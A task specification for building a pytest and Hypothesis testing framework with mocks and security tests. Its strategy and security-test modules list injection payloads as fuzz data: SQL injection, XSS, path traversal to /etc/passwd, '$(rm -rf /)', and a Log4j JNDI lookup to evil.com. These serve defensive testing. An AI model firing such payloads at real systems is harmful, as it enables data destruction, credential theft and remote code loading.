# TASK_13: Testing Infrastructure & Framework Setup
**Created By**: Adder_1 | **Priority**: HIGH | **Duration**: 4 hours
**Technique Focus**: All ADDER+ techniques + Property-based testing + Security testing
**Size Constraint**: Target <200 lines/module, Max 300 if splitting is awkward
## Status & Assignment
**Status**: COMPLETE
**Assigned**: Adder_1
**Dependencies**: None (Parallel infrastructure task)
**Blocking**: All future testing (enables TASK_1-12 validation)
## Required Reading (Complete before starting)
- [x] **Testing Strategy**: `tests/TESTING.md` - Current test status and planned framework
- [x] **Architecture**: `ARCHITECTURE.md` - System components requiring testing
- [x] **FastMCP Protocol**: `development/protocols/FASTMCP_PYTHON_PROTOCOL.md` - Integration patterns
- [ ] **Security Contracts**: Understanding security testing requirements
## Objective & Context
**Goal**: Establish comprehensive testing infrastructure with property-based testing, security validation, and a CI/CD pipeline
**Context**: Foundation for all future development validation - enables immediate testing of TASK_1-12 deliverables
<thinking>
Testing Infrastructure Analysis:
1. Current state: 0 tests, no framework setup
2. Need comprehensive testing strategy covering all ADDER+ techniques
3. Property-based testing with Hypothesis for edge case discovery
4. Security testing framework for penetration testing
5. Performance benchmarking for concurrent agent operations
6. Mock infrastructure for iTerm2 and Claude Code dependencies
7. CI/CD integration for automated testing
8. Test data management and fixtures
</thinking>
## Implementation Subtasks (Sequential completion)
### Phase 1: Core Testing Framework Setup
- [x] **Subtask 1.1**: Configure pytest with asyncio, coverage, and parallel execution
- [x] **Subtask 1.2**: Install and configure Hypothesis for property-based testing
- [x] **Subtask 1.3**: Set up security testing tools (bandit, safety, pytest-security)
- [x] **Subtask 1.4**: Configure performance benchmarking with pytest-benchmark
### Phase 2: Mock Infrastructure & Fixtures
- [x] **Subtask 2.1**: Create comprehensive test fixtures for all domain types
- [x] **Subtask 2.2**: Implement mock iTerm2 manager for isolated testing
- [x] **Subtask 2.3**: Create mock Claude Code integration for unit testing
- [x] **Subtask 2.4**: Set up temporary filesystem and session mocking
### Phase 3: Property-Based Testing Foundation
- [x] **Subtask 3.1**: Define Hypothesis strategies for all domain types
- [x] **Subtask 3.2**: Create property-based test templates for security validation
- [x] **Subtask 3.3**: Implement concurrent operation testing framework
- [x] **Subtask 3.4**: Add input fuzzing and edge case generation
### Phase 4: CI/CD Integration & Documentation
- [x] **Subtask 4.1**: Create GitHub Actions workflow for automated testing
- [x] **Subtask 4.2**: Set up coverage reporting and quality gates (a local sketch follows this list)
- [x] **Subtask 4.3**: Add security scanning and vulnerability detection
- [x] **Subtask 4.4**: Create comprehensive testing documentation and guidelines
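The coverage gate from Subtask 4.2 can be exercised locally before CI enforces it. A minimal sketch, assuming pytest-cov and pytest-xdist are installed and the package lives under `src/` (the package path and the 90% threshold are placeholders; keep them in sync with the real CI configuration):
```python
# scripts/quality_gate.py (sketch) - runs the same gate CI enforces
import sys
import pytest

def run_quality_gate() -> int:
    """Run the suite with coverage and fail below the agreed threshold."""
    return pytest.main([
        "tests/",
        "--cov=src",                 # placeholder package path
        "--cov-report=term-missing",
        "--cov-fail-under=90",       # placeholder threshold; match CI
        "-n", "auto",                # parallel execution via pytest-xdist
    ])

if __name__ == "__main__":
    sys.exit(run_quality_gate())
```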
## Implementation Files & Specifications
**Files to Create/Modify**:
- `tests/conftest.py` - Global pytest configuration and fixtures (Target: <200 lines)
- `tests/fixtures/domain.py` - Domain-specific test fixtures (Target: <250 lines)
- `tests/mocks/iterm_manager.py` - iTerm2 manager mocking infrastructure (Target: <200 lines)
- `tests/mocks/claude_code.py` - Claude Code integration mocking (Target: <150 lines)
- `tests/strategies/hypothesis_strategies.py` - Hypothesis strategies for all types (Target: <200 lines)
- `tests/properties/base_properties.py` - Base property-based test templates (Target: <200 lines)
- `tests/security/penetration_tests.py` - Security testing framework (Target: <250 lines)
- `tests/performance/benchmarks.py` - Performance benchmark suite (Target: <200 lines)
- `.github/workflows/test.yml` - CI/CD pipeline configuration
- `pyproject.toml` - Updated with test configuration
- `tests/README.md` - Comprehensive testing documentation
**Key Requirements**:
- Pytest with asyncio support for async/await testing
- Hypothesis for property-based testing with security focus
- Mock infrastructure that doesn't require iTerm2 or Claude Code
- Performance benchmarking for concurrency and resource usage (sketched after this list)
- Security testing with input fuzzing and penetration testing
- CI/CD integration with quality gates and coverage reporting
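To make the benchmarking requirement concrete, here is a minimal sketch of what `tests/performance/benchmarks.py` could contain, using the standard pytest-benchmark fixture; `spawn_agents` is a hypothetical stand-in for whichever concurrent operation ends up being measured:
```python
# tests/performance/benchmarks.py (sketch)
import asyncio
from typing import List

async def spawn_agents(count: int) -> List[str]:
    """Hypothetical stand-in for a concurrent agent-spawning operation."""
    async def spawn(n: int) -> str:
        await asyncio.sleep(0)  # placeholder for real spawn work
        return f"Agent_{n}"
    return await asyncio.gather(*(spawn(n) for n in range(1, count + 1)))

def test_concurrent_spawn_benchmark(benchmark):
    """Measure the wall-clock cost of spawning 50 agents concurrently."""
    result = benchmark(lambda: asyncio.run(spawn_agents(50)))
    assert len(result) == 50
```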
## Modularity Strategy
**Size Management**:
- Separate testing concerns into focused modules (mocks, fixtures, strategies)
- Use composition for complex test scenarios
- Break property-based tests into reusable templates
- Keep individual test files focused and maintainable
**Organization Principles**:
- Single responsibility per testing module
- Clear separation between unit, integration, and property-based tests
- Minimal coupling between test components
- Maximum reusability of fixtures and mocking infrastructure
## Success Criteria & Verification
**Completion Requirements**:
- [ ] Complete pytest framework with asyncio and coverage support
- [ ] Hypothesis property-based testing framework operational
- [ ] Comprehensive mock infrastructure for external dependencies
- [ ] Security testing framework with input fuzzing capabilities
- [ ] Performance benchmarking suite for critical operations
- [ ] CI/CD pipeline with automated testing and quality gates
- [ ] Complete testing documentation and guidelines
- [ ] Example tests demonstrating all testing capabilities
**Quality Gates**:
- Framework: pytest executes successfully with 0 tests initially
- Mocking: Mock infrastructure works without external dependencies
- Properties: Hypothesis generates valid test cases for all domain types
- Security: Security testing framework detects vulnerabilities
- Performance: Benchmark suite measures critical operation performance
- CI/CD: Automated pipeline runs successfully on code changes
## Handoff Information
**Next Task Dependencies**: All TASK_1-12 will use this testing infrastructure
**Integration Points**: Testing framework supports all system components
**Future Considerations**: Framework extensible for additional testing needs
## Implementation Templates
### **Global Test Configuration**
```python
# tests/conftest.py
import asyncio
from pathlib import Path
from typing import AsyncGenerator

import pytest
import pytest_asyncio

from tests.mocks.iterm_manager import MockiTermManager
from tests.mocks.claude_code import MockClaudeCodeManager
from tests.fixtures.domain import *  # Import all domain fixtures

pytest_plugins = ["pytest_asyncio"]


@pytest.fixture(scope="session")
def event_loop():
    """Create an instance of the default event loop for the test session."""
    loop = asyncio.get_event_loop_policy().new_event_loop()
    yield loop
    loop.close()


@pytest_asyncio.fixture
async def mock_iterm_manager() -> AsyncGenerator[MockiTermManager, None]:
    """Provide a mock iTerm2 manager for testing without an iTerm2 dependency."""
    manager = MockiTermManager()
    await manager.initialize()
    try:
        yield manager
    finally:
        await manager.cleanup()


@pytest_asyncio.fixture
async def mock_claude_manager() -> AsyncGenerator[MockClaudeCodeManager, None]:
    """Provide a mock Claude Code manager for testing without a Claude Code dependency."""
    manager = MockClaudeCodeManager()
    await manager.initialize()
    try:
        yield manager
    finally:
        await manager.cleanup()


@pytest.fixture
def temp_session_root(tmp_path: Path) -> Path:
    """Provide a temporary directory tree mirroring the session layout."""
    session_dir = tmp_path / "test_session"
    session_dir.mkdir()
    # Create the basic session structure
    (session_dir / ".claude_session").mkdir()
    (session_dir / "development").mkdir()
    (session_dir / "development" / "tasks").mkdir()
    return session_dir


@pytest.fixture
def sample_todo_content() -> str:
    """Provide sample TODO.md content for testing."""
    return '''# Project Task Management Dashboard
**Project**: Test Project
**Last Updated**: 2025-06-26 by Adder_1
## Current Assignments
| Task | Status | Agent | Priority | Dependencies |
|------|--------|-------|----------|--------------|
| TASK_1 | IN_PROGRESS | Adder_3 | HIGH | None |
| TASK_2 | IN_PROGRESS | Adder_4 | HIGH | None |
'''
```
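The conftest above imports `MockiTermManager` from `tests/mocks/iterm_manager.py`, for which no template is given here. The following is a minimal sketch of the interface the fixtures assume: an `initialize`/`cleanup` lifecycle plus in-memory session bookkeeping (`create_session` is a hypothetical example method, not a confirmed part of the real manager's API):
```python
# tests/mocks/iterm_manager.py (sketch of the interface conftest.py assumes)
from typing import Dict

class MockiTermManager:
    """In-memory stand-in for the real iTerm2 manager; no iTerm2 required."""

    def __init__(self) -> None:
        self._initialized = False
        self._sessions: Dict[str, str] = {}  # session_id -> status

    async def initialize(self) -> None:
        """Mirror the real manager's async startup handshake."""
        self._initialized = True

    async def create_session(self, session_id: str) -> str:
        """Hypothetical method: record a fake session and return its ID."""
        assert self._initialized, "initialize() must be called first"
        self._sessions[session_id] = "running"
        return session_id

    async def cleanup(self) -> None:
        """Tear down all fake sessions so tests stay isolated."""
        self._sessions.clear()
        self._initialized = False
```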
### **Hypothesis Strategies**
```python
# tests/strategies/hypothesis_strategies.py
import string
from typing import NewType

from hypothesis import strategies as st

# Branded ID types used across the domain layer
AgentId = NewType('AgentId', str)
SessionId = NewType('SessionId', str)

# Agent name strategy (Agent_<n>)
agent_name_strategy = st.builds(
    lambda n: f"Agent_{n}",
    st.integers(min_value=1, max_value=999),
)

# Valid session ID strategy
session_id_strategy = st.builds(
    lambda prefix, uuid_part: f"{prefix}_{uuid_part}",
    st.sampled_from(["session", "dev", "prod"]),
    st.text(
        alphabet=string.ascii_lowercase + string.digits,
        min_size=8,
        max_size=16,
    ),
)

# File path strategies
safe_filename_strategy = st.text(
    alphabet=string.ascii_letters + string.digits + "_-.",
    min_size=1,
    max_size=50,
).filter(lambda x: not x.startswith('.'))  # also excludes '.' and '..'

relative_path_strategy = st.builds(
    lambda parts: "/".join(parts),
    st.lists(safe_filename_strategy, min_size=1, max_size=5),
)

# Security-focused strategies
malicious_input_strategy = st.one_of(
    st.text(min_size=1, max_size=1000),  # General text
    st.sampled_from([  # Common injection patterns
        "'; DROP TABLE agents; --",
        "<script>alert('xss')</script>",
        "../../../etc/passwd",
        "$(rm -rf /)",
        "'; cat /etc/passwd; echo '",
        "\\x00\\x00\\x00\\x00",
        "' OR '1'='1",
        "${jndi:ldap://evil.com/a}",
    ]),
    st.binary(min_size=1, max_size=100).map(lambda x: x.decode('utf-8', errors='ignore')),
)

# Agent configuration strategies
agent_config_strategy = st.builds(
    dict,
    model=st.sampled_from(["sonnet-3.5", "opus-3", "haiku-3"]),
    no_color=st.booleans(),
    verbose=st.booleans(),
    memory_limit=st.integers(min_value=128, max_value=2048),
)


def create_property_test_strategy(type_class):
    """Create a Hypothesis strategy for testing type validation properties."""
    if hasattr(type_class, '__annotations__'):
        field_strategies = {}
        for field_name, field_type in type_class.__annotations__.items():
            if field_type == str:
                field_strategies[field_name] = st.text(min_size=0, max_size=100)
            elif field_type == int:
                field_strategies[field_name] = st.integers()
            elif field_type == bool:
                field_strategies[field_name] = st.booleans()
            # Add more type mappings as needed
        return st.builds(type_class, **field_strategies)
    return st.none()
```
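A short usage sketch showing how these strategies drive a property test; `parse_agent_number` is a hypothetical helper used only for illustration:
```python
from hypothesis import given
from tests.strategies.hypothesis_strategies import agent_name_strategy

def parse_agent_number(name: str) -> int:
    """Hypothetical parser: extract the numeric suffix from 'Agent_<n>'."""
    return int(name.split("_", 1)[1])

@given(name=agent_name_strategy)
def test_agent_name_roundtrip(name: str):
    # Rebuilding the name from the parsed number must reproduce the input
    assert f"Agent_{parse_agent_number(name)}" == name
```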
### **Property-Based Test Templates**
```python
# tests/properties/base_properties.py
from typing import Any, Callable, TypeVar

import pytest
from hypothesis import given, strategies as st, assume

T = TypeVar('T')


# Placeholder exception types so this module is self-contained;
# swap in the project's real security/validation exceptions.
class SecurityError(Exception):
    pass


class ValidationError(Exception):
    pass


# Factories are prefixed make_ (not test_) so pytest does not try to
# collect them directly; bind their return values to test_* names instead.
def make_serialization_roundtrip_property(
    serialize_func: Callable[[T], str],
    deserialize_func: Callable[[str], T],
    strategy: st.SearchStrategy[T],
):
    """Property: serialization and deserialization are roundtrip safe."""
    @given(data=strategy)
    def roundtrip_test(data: T):
        serialized = serialize_func(data)
        deserialized = deserialize_func(serialized)
        assert deserialized == data
    return roundtrip_test


def make_input_validation_property(
    validation_func: Callable[[Any], bool],
    valid_strategy: st.SearchStrategy[Any],
    invalid_strategy: st.SearchStrategy[Any],
):
    """Property: validation accepts valid inputs and rejects invalid ones."""
    @given(valid_input=valid_strategy)
    def valid_inputs_accepted(valid_input):
        assert validation_func(valid_input) is True

    @given(invalid_input=invalid_strategy)
    def invalid_inputs_rejected(invalid_input):
        assume(invalid_input is not None)  # Avoid the None edge case
        assert validation_func(invalid_input) is False

    return valid_inputs_accepted, invalid_inputs_rejected


def make_security_boundary_property(
    boundary_func: Callable[[Any], bool],
    malicious_strategy: st.SearchStrategy[Any],
):
    """Property: security boundaries are never bypassed by malicious input."""
    @given(malicious_input=malicious_strategy)
    def security_boundary_holds(malicious_input):
        try:
            result = boundary_func(malicious_input)
            # If no exception was raised, the result must indicate rejection
            assert result is False or result is None
        except (ValueError, SecurityError, ValidationError):
            # Security exceptions are expected and acceptable
            pass
        except Exception as e:
            # Unexpected exceptions indicate potential security issues
            pytest.fail(f"Unexpected exception: {type(e).__name__}: {e}")
    return security_boundary_holds


class PropertyTestBase:
    """Base class for property-based testing with common patterns."""

    @staticmethod
    def assert_immutability(obj: Any, operation: Callable[[Any], Any]):
        """Assert that an operation doesn't modify the original object."""
        original_state = repr(obj)  # Capture state via repr
        operation(obj)
        new_state = repr(obj)
        assert original_state == new_state, "Object was unexpectedly modified"

    @staticmethod
    def assert_idempotent(operation: Callable[[T], T], input_val: T):
        """Assert that an operation is idempotent (f(f(x)) == f(x))."""
        result1 = operation(input_val)
        result2 = operation(result1)
        assert result1 == result2, "Operation is not idempotent"

    @staticmethod
    def assert_commutative(operation: Callable[[T, T], T], a: T, b: T):
        """Assert that an operation is commutative (f(a,b) == f(b,a))."""
        result1 = operation(a, b)
        result2 = operation(b, a)
        assert result1 == result2, "Operation is not commutative"
```
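As a usage sketch, the roundtrip template can be bound to JSON serialization of agent configs (both choices are illustrative, not prescribed by this task):
```python
import json
from tests.properties.base_properties import make_serialization_roundtrip_property
from tests.strategies.hypothesis_strategies import agent_config_strategy

# Bind the template once; pytest collects the returned function as a test.
test_agent_config_json_roundtrip = make_serialization_roundtrip_property(
    serialize_func=json.dumps,
    deserialize_func=json.loads,
    strategy=agent_config_strategy,
)
```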
### **Security Testing Framework**
```python
# tests/security/penetration_tests.py
import asyncio
import time
from typing import Any, Awaitable, Callable, Dict, List, Optional

import pytest
from hypothesis import given

from tests.strategies.hypothesis_strategies import malicious_input_strategy
from tests.properties.base_properties import SecurityError, ValidationError


# Placeholder exception types; swap in the project's real ones.
class AuthenticationError(Exception):
    pass


class ResourceLimitError(Exception):
    pass


class SecurityTestFramework:
    """Comprehensive security testing framework for penetration testing."""

    @staticmethod
    async def test_input_injection_resistance(
        input_handler: Callable[[str], Awaitable[Any]],
        malicious_inputs: Optional[List[str]] = None,
    ):
        """Test resistance to various injection attacks."""
        default_malicious_inputs = [
            "'; DROP TABLE agents; --",       # SQL injection
            "<script>alert('xss')</script>",  # XSS
            "../../../etc/passwd",            # Path traversal
            "$(rm -rf /)",                    # Command injection
            "'; cat /etc/passwd; echo '",     # Command chaining
            "\\x00\\x00\\x00\\x00",           # Null byte injection
            "' OR '1'='1",                    # Authentication bypass
            "${jndi:ldap://evil.com/a}",      # Log4j-style injection
            "{{7*7}}",                        # Template injection
            "javascript:alert('xss')",        # JavaScript protocol
        ]
        test_inputs = malicious_inputs or default_malicious_inputs
        for malicious_input in test_inputs:
            try:
                result = await input_handler(malicious_input)
                # If no exception was raised, the result must be safely handled
                assert not _contains_unescaped_content(result, malicious_input)
            except (ValueError, SecurityError, ValidationError):
                # Expected security exceptions are acceptable
                pass
            except Exception as e:
                pytest.fail(f"Unexpected exception for input '{malicious_input}': {e}")

    @staticmethod
    def make_boundary_enforcement_property(boundary_validator: Callable[[str], bool]):
        """Build a property-based test for security boundary enforcement."""
        @given(malicious_input=malicious_input_strategy)
        def boundary_holds(malicious_input: str):
            try:
                is_valid = boundary_validator(malicious_input)
                # Malicious inputs should be rejected
                assert not is_valid, f"Malicious input was accepted: {malicious_input[:50]}"
            except (SecurityError, ValidationError):
                # Security exceptions are expected
                pass
        return boundary_holds

    @staticmethod
    async def test_privilege_escalation_resistance(
        privileged_operation: Callable[..., Awaitable[Any]],
        unprivileged_context: Dict[str, Any],
    ):
        """Test resistance to privilege escalation attempts."""
        try:
            result = await privileged_operation(**unprivileged_context)
            # Should either fail or return a limited result
            assert _is_safe_result(result), "Privileged operation succeeded without proper authorization"
        except (PermissionError, SecurityError, AuthenticationError):
            # Expected security exceptions
            pass

    @staticmethod
    async def test_resource_exhaustion_resistance(
        resource_operation: Callable[..., Awaitable[Any]],
        excessive_parameters: Dict[str, Any],
    ):
        """Test resistance to resource exhaustion attacks."""
        start_time = time.monotonic()
        try:
            result = await asyncio.wait_for(
                resource_operation(**excessive_parameters),
                timeout=10.0,  # Hard ceiling for the whole operation
            )
            elapsed = time.monotonic() - start_time
            # The operation should complete quickly or be properly limited
            assert elapsed < 5.0, f"Operation took too long: {elapsed}s"
            assert _is_reasonable_resource_usage(result), "Excessive resource usage detected"
        except (asyncio.TimeoutError, ResourceLimitError):
            # Expected timeout or resource-limit exceptions
            pass


def _contains_unescaped_content(result: Any, malicious_input: str) -> bool:
    """Check whether the result contains unescaped malicious content."""
    if isinstance(result, str):
        return malicious_input in result
    if isinstance(result, dict):
        return any(malicious_input in str(v) for v in result.values())
    return False


def _is_safe_result(result: Any) -> bool:
    """Check whether the result is safe (limited/filtered)."""
    if result is None:
        return True
    if isinstance(result, dict) and result.get('error'):
        return True
    if isinstance(result, str) and len(result) < 1000:
        return True
    return False


def _is_reasonable_resource_usage(result: Any) -> bool:
    """Check whether the result indicates reasonable resource usage."""
    if isinstance(result, dict):
        size = result.get('size', 0)
        return size < 10_000_000  # 10 MB limit
    return True
```
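Finally, a usage sketch for the framework; `guarded_handler` is a hypothetical input handler enforcing a strict character allowlist, which is what lets it reject every default payload:
```python
import re
import pytest
from tests.security.penetration_tests import SecurityTestFramework

async def guarded_handler(text: str) -> str:
    """Hypothetical handler: allow only a strict character allowlist."""
    if not re.fullmatch(r"[A-Za-z0-9_\- ]+", text):
        raise ValueError("input rejected")
    return f"ok: {text}"

@pytest.mark.asyncio
async def test_guarded_handler_resists_injection():
    # Every default payload must be rejected or safely neutralized
    await SecurityTestFramework.test_input_injection_resistance(guarded_handler)
```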
This testing infrastructure provides comprehensive coverage for all ADDER+ techniques with property-based testing, security validation, and CI/CD integration.